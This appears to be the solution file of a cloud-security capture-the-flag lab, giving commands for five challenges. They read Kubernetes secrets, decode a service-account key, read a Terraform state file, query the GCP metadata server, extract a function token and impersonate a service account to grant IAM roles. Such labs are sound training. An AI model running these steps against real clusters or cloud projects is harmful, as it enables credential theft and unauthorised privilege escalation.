Skip to content

solution.md

Latest commit

 

History

History
200 lines (136 loc) · 4.38 KB

solution.md

File metadata and controls

200 lines (136 loc) · 4.38 KB

Commands

***** Challenge 1 *****

Challenge 1

set cluster IP

export IP=<IP>

Access API

curl -k https://$IP/api

Set your token as environment variable.

export TOKEN=<token>

Send a request with your token to the Kubernetes API:

curl -k -H "Authorization:Bearer $TOKEN" https://$IP/api/

You can find out which permissions 'system:authenticated' has on this cluster with a request to this endpoint:

curl -k -X POST -H "Content-Type: application/json" -d '{"apiVersion":"authorization.k8s.io/v1", "kind":"SelfSubjectRulesReview", "spec":{"namespace":"default"}}' -H "Authorization:Bearer $TOKEN" https://$IP/apis/authorization.k8s.io/v1/selfsubjectrulesreviews

You can also query them by using the Kubernetes API:

curl -k -H "Authorization:Bearer $TOKEN" https://$IP/api/v1/namespaces/default/pods
Walkthrough Challenge 1

You can read Kubernetes secrets in the default namespace on the cluster. Which secrets might it hold?

  curl -k -H "Authorization:Bearer $TOKEN" https://$IP/api/v1/namespaces/default/secrets

The secret values are base64 encoded. Decode them to read the value:

  echo -n <secret-value> | base64 -d

Safe blob to file

  echo -n <secret-value> | base64 -d  > /tmp/sa_key.json

***** Challenge 2 *****

Challenge 2

set project id

export PROJECT_ID=nodal-seer-306517

activate service account

gcloud auth activate-service-account --key-file /tmp/sa_key.json

check service account

gcloud auth list
Walkthrough Challenge 2

List files on bucket

gsutil ls gs://file-uploads-$PROJECT_ID

Read state file on bucket

gsutil cat gs://file-uploads-$PROJECT_ID/default.tfstate

***** Challenge 3 *****

Challenge 3

read state file

gsutil cat gs://file-uploads-$PROJECT_ID/default.tfstate
Walkthrough Challenge 3

ssh into vm

ssh -i <private key file> alice@<compute instance IP>

***** Challenge 4 *****

Challenge 4

show VM service account

gcloud auth list

background: metadata server

curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/" -H "Metadata-Flavor: Google"

demonstrate limited access scopes

gcloud compute instances list

show access scopes from tokeninfo endpoint

curl -i https://www.googleapis.com/oauth2/v3/tokeninfo\?access_token=$(gcloud auth print-access-token)

list storage buckets from VM

gsutil ls
Walkthrough Challenge 4

list function source code bucket

  gsutil ls gs://cloud-function-bucket-challenge4

read source code

  gsutil cat gs://cloud-function-bucket-challenge4/main.py

execute function invocation script

  ./invoke_monitoring_function.sh

extract command to get function token

curl -s -X POST https://$LOCATION-$PROJECT_ID.cloudfunctions.net/monitoring-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{"metadata": "token"}'

save the new token in env var and check access scopes

curl -i https://www.googleapis.com/oauth2/v3/tokeninfo\?access_token=$TOKEN

***** Challenge 5 *****

Challenge 5

set token as env var

 export CLOUDSDK_AUTH_ACCESS_TOKEN=<function token>

Get project permissions

gcloud projects get-iam-policy $PROJECT_ID

List the other service accounts on this project:

gcloud iam service-accounts list

Describe role

gcloud iam roles describe TerraformPipelineProjectAdmin --project $PROJECT_ID

Describe bindings on SA

gcloud iam service-accounts get-iam-policy <terraform service account>
Walkthrough Challenge 5

impersonate and set binding

gcloud projects add-iam-policy-binding $PROJECT_ID --member=user:<your Google account> --role=roles/viewer --impersonate-service-account <terraform pipeline account>